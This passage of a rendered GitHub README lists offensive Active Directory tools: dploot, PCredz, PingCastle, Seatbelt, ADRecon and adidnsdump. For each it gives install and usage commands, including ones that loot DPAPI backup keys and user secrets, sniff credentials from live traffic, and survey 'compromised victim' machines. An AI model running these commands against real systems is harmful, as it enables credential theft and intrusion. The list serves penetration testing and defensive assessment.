3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eDPAPI (Data Protection Application Programming Interface) provides a set of APIs to encrypt and decrypt data where a user password is typically used to set the 'master key' (in a user scenario). So to leverage DPAPI to gain access to certain data (Chrome Cookies/Login Data, the Windows Credential Manager/Vault etc) we just need access to a password.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003edploot is Python rewrite of SharpDPAPI written un C# by Harmj0y, which is itself a port of DPAPI from Mimikatz by gentilkiwi. It implements all the DPAPI logic of these tools, but this time it is usable with a python interpreter and from a Linux environment.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107\" rel=\"nofollow\"\u003eBlog - Operational Guidance for Offensive User DPAPI Abuse\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Pip)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"pip install dploot\"\u003e\u003cpre\u003epip install dploot\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Git)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/zblurx/dploot.git\ncd dploot\nmake\"\u003e\u003cpre\u003egit clone https://github.com/zblurx/dploot.git\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e dploot\nmake\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Loot decrypted machine private key files as a Windows local administrator \ndploot machinecertificates -d waza.local -u Administrator -p 'Password!123' 192.168.56.14 -quiet\n\n# Loot the DPAPI backup key as a Windows Domain Administrator (Will allow attacker to loot and decrypt any DPAPI protected password realted to a domain user)\ndploot backupkey -d waza.local -u Administrator -p 'Password!123' 192.168.56.112 -quiet\n\n# Leverage the DPAPI backup key `key.pvk` to loot any user secrets stored on Windows domain joined endpoints\ndploot certificates -d waza.local -u Administrator -p 'Password!123' 192.168.56.14 -pvk key.pvk -quiet \"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Loot decrypted machine private key files as a Windows local administrator \u003c/span\u003e\ndploot machinecertificates -d waza.local -u Administrator -p \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003ePassword!123\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e 192.168.56.14 -quiet\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Loot the DPAPI backup key as a Windows Domain Administrator (Will allow attacker to loot and decrypt any DPAPI protected password realted to a domain user)\u003c/span\u003e\ndploot backupkey -d waza.local -u Administrator -p \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003ePassword!123\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e 192.168.56.112 -quiet\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Leverage the DPAPI backup key `key.pvk` to loot any user secrets stored on Windows domain joined endpoints\u003c/span\u003e\ndploot certificates -d waza.local -u Administrator -p \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003ePassword!123\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e 192.168.56.14 -pvk key.pvk -quiet \u003c/pre\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eDiscovery\u003c/h1\u003e\u003ca id=\"user-content-discovery\" class=\"anchor\" aria-label=\"Permalink: Discovery\" href=\"#discovery\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/lgandx/PCredz\"\u003ePCredz\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-pcredz\" class=\"anchor\" aria-label=\"Permalink: 🔙PCredz\" href=\"#pcredz\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThis tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/lgandx/PCredz\"\u003e\u003cpre\u003egit clone https://github.com/lgandx/PCredz\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e (PCAP File Folder)\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-python notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"python3 ./Pcredz -d /tmp/pcap-directory-to-parse/\"\u003e\u003cpre\u003e\u003cspan class=\"pl-s1\"\u003epython3\u003c/span\u003e .\u003cspan class=\"pl-c1\"\u003e/\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ePcredz\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ed\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003e/\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003etmp\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e/\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003epcap\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003edirectory\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003eto\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003eparse\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e/\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e (Live Capture)\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-python notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"python3 ./Pcredz -i eth0 -v\"\u003e\u003cpre\u003e\u003cspan class=\"pl-s1\"\u003epython3\u003c/span\u003e .\u003cspan class=\"pl-c1\"\u003e/\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ePcredz\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ei\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003eeth0\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ev\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/191007004-a0fd01f3-e01f-4bdb-b89e-887c85a7be91.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/191007004-a0fd01f3-e01f-4bdb-b89e-887c85a7be91.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/vletoux/pingcastle\"\u003ePingCastle\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-pingcastle\" class=\"anchor\" aria-label=\"Permalink: 🔙PingCastle\" href=\"#pingcastle\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003ePing Castle is a tool designed to assess quickly the Active Directory security level with a methodology based on risk assessment and a maturity framework. It does not aim at a perfect evaluation but rather as an efficiency compromise.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e (Download)\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"https://github.com/vletoux/pingcastle/releases/download/2.11.0.1/PingCastle_2.11.0.1.zip\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003ehttps://github.com/vletoux/pingcastle/releases/download/2.11.0.1/PingCastle_2.11.0.1.zip\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-python notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"./PingCastle.exe\"\u003e\u003cpre\u003e.\u003cspan class=\"pl-c1\"\u003e/\u003c/span\u003e\u003cspan class=\"pl-v\"\u003ePingCastle\u003c/span\u003e.\u003cspan class=\"pl-c1\"\u003eexe\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/191008405-39bab2dc-54ce-43d1-aed7-53956776a9ef.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/191008405-39bab2dc-54ce-43d1-aed7-53956776a9ef.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/GhostPack/Seatbelt\"\u003eSeatbelt\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-seatbelt\" class=\"anchor\" aria-label=\"Permalink: 🔙Seatbelt\" href=\"#seatbelt\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eSeatbelt is a useful tool for gathering detailed information about the security posture of a target Windows machine in order to identify potential vulnerabilities and attack vectors.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt is designed to be run on a compromised victim machine to gather information about the current security configuration, including information about installed software, services, group policies, and other security-related settings\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Compile)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSeatbelt has been built against .NET 3.5 and 4.0 with C# 8.0 features and is compatible with \u003ca href=\"https://visualstudio.microsoft.com/downloads/\" rel=\"nofollow\"\u003eVisual Studio Community Edition\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOpen up the project .sln, choose \"release\", and build.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Run all checks and output to output.txt\nSeatbelt.exe -group=all -full \u0026gt; output.txt\n\n# Return 4624 logon events for the last 30 days\nSeatbelt.exe \u0026quot;LogonEvents 30\u0026quot;\n\n# Query the registry three levels deep, returning only keys/valueNames/values that match the regex .*defini.*\nSeatbelt.exe \u0026quot;reg \\\u0026quot;HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\\u0026quot; 3 .*defini.* true\u0026quot;\n\n# Run remote-focused checks against a remote system\nSeatbelt.exe -group=remote -computername=192.168.230.209 -username=THESHIRE\\sam -password=\u0026quot;yum \\\u0026quot;po-ta-toes\\\u0026quot;\u0026quot;\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run all checks and output to output.txt\u003c/span\u003e\nSeatbelt.exe -group=all -full \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e output.txt\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Return 4624 logon events for the last 30 days\u003c/span\u003e\nSeatbelt.exe \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eLogonEvents 30\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Query the registry three levels deep, returning only keys/valueNames/values that match the regex .*defini.*\u003c/span\u003e\nSeatbelt.exe \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ereg \u003cspan class=\"pl-cce\"\u003e\\\"\u003c/span\u003eHKLM\\SOFTWARE\\Microsoft\\Windows Defender\u003cspan class=\"pl-cce\"\u003e\\\"\u003c/span\u003e 3 .*defini.* true\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run remote-focused checks against a remote system\u003c/span\u003e\nSeatbelt.exe -group=remote -computername=192.168.230.209 -username=THESHIRE\u003cspan class=\"pl-cce\"\u003e\\s\u003c/span\u003eam -password=\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eyum \u003cspan class=\"pl-cce\"\u003e\\\"\u003c/span\u003epo-ta-toes\u003cspan class=\"pl-cce\"\u003e\\\"\u003c/span\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull command groups and parameters can be found \u003ca href=\"https://github.com/GhostPack/Seatbelt#command-groups\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210137456-14eb3329-f29d-4ce1-a595-3466bd5a962f.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210137456-14eb3329-f29d-4ce1-a595-3466bd5a962f.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://exord66.github.io/csharp-in-memory-assemblies\" rel=\"nofollow\"\u003ehttps://exord66.github.io/csharp-in-memory-assemblies\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/sense-of-security/adrecon\"\u003eADRecon\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-adrecon\" class=\"anchor\" aria-label=\"Permalink: 🔙ADRecon\" href=\"#adrecon\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eGreat tool for gathering information about a victim's Microsoft Active Directory (AD) environment, with support for Excel outputs.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt can be run from any workstation that is connected to the environment, even hosts that are not domain members.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://speakerdeck.com/prashant3535/adrecon-bh-usa-2018-arsenal-and-def-con-26-demo-labs-presentation\" rel=\"nofollow\"\u003eBlackHat USA 2018 SlideDeck\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003ePrerequisites\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e.NET Framework 3.0 or later (Windows 7 includes 3.0)\u003c/li\u003e\n\u003cli\u003ePowerShell 2.0 or later (Windows 7 includes 2.0)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Git)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/sense-of-security/ADRecon.git\"\u003e\u003cpre\u003egit clone https://github.com/sense-of-security/ADRecon.git\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Download)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou can download a zip archive of the \u003ca href=\"https://github.com/sense-of-security/ADRecon/archive/master.zip\"\u003elatest release\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# To run ADRecon on a domain member host.\nPS C:\\\u0026gt; .\\ADRecon.ps1\n\n# To run ADRecon on a domain member host as a different user.\nPS C:\\\u0026gt;.\\ADRecon.ps1 -DomainController \u0026lt;IP or FQDN\u0026gt; -Credential \u0026lt;domain\\username\u0026gt;\n\n# To run ADRecon on a non-member host using LDAP.\nPS C:\\\u0026gt;.\\ADRecon.ps1 -Protocol LDAP -DomainController \u0026lt;IP or FQDN\u0026gt; -Credential \u0026lt;domain\\username\u0026gt;\n\n# To run ADRecon with specific modules on a non-member host with RSAT. (Default OutputType is STDOUT with -Collect parameter)\nPS C:\\\u0026gt;.\\ADRecon.ps1 -Protocol ADWS -DomainController \u0026lt;IP or FQDN\u0026gt; -Credential \u0026lt;domain\\username\u0026gt; -Collect Domain, DomainControllers\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e To run ADRecon on a domain member host.\u003c/span\u003e\nPS C:\u003cspan class=\"pl-cce\"\u003e\\\u0026gt;\u003c/span\u003e .\u003cspan class=\"pl-cce\"\u003e\\A\u003c/span\u003eDRecon.ps1\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e To run ADRecon on a domain member host as a different user.\u003c/span\u003e\nPS C:\u003cspan class=\"pl-cce\"\u003e\\\u0026gt;\u003c/span\u003e.\u003cspan class=\"pl-cce\"\u003e\\A\u003c/span\u003eDRecon.ps1 -DomainController \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eIP or FQDN\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -Credential \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003edomain\u003cspan class=\"pl-cce\"\u003e\\u\u003c/span\u003esername\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e To run ADRecon on a non-member host using LDAP.\u003c/span\u003e\nPS C:\u003cspan class=\"pl-cce\"\u003e\\\u0026gt;\u003c/span\u003e.\u003cspan class=\"pl-cce\"\u003e\\A\u003c/span\u003eDRecon.ps1 -Protocol LDAP -DomainController \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eIP or FQDN\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -Credential \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003edomain\u003cspan class=\"pl-cce\"\u003e\\u\u003c/span\u003esername\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e To run ADRecon with specific modules on a non-member host with RSAT. (Default OutputType is STDOUT with -Collect parameter)\u003c/span\u003e\nPS C:\u003cspan class=\"pl-cce\"\u003e\\\u0026gt;\u003c/span\u003e.\u003cspan class=\"pl-cce\"\u003e\\A\u003c/span\u003eDRecon.ps1 -Protocol ADWS -DomainController \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eIP or FQDN\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -Credential \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003edomain\u003cspan class=\"pl-cce\"\u003e\\u\u003c/span\u003esername\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -Collect Domain, DomainControllers\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage and parameter information can be found \u003ca href=\"https://github.com/sense-of-security/adrecon#usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210137064-2a0247b3-5d28-409a-904b-0fd9db87ef56.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210137064-2a0247b3-5d28-409a-904b-0fd9db87ef56.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://vk9-sec.com/domain-enumeration-powerview-adrecon/\" rel=\"nofollow\"\u003ehttps://vk9-sec.com/domain-enumeration-powerview-adrecon/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/dirkjanm/adidnsdump\"\u003eadidnsdump\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-adidnsdump\" class=\"anchor\" aria-label=\"Permalink: 🔙adidnsdump\" href=\"#adidnsdump\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eBy default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones, similar to a zone transfer.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal 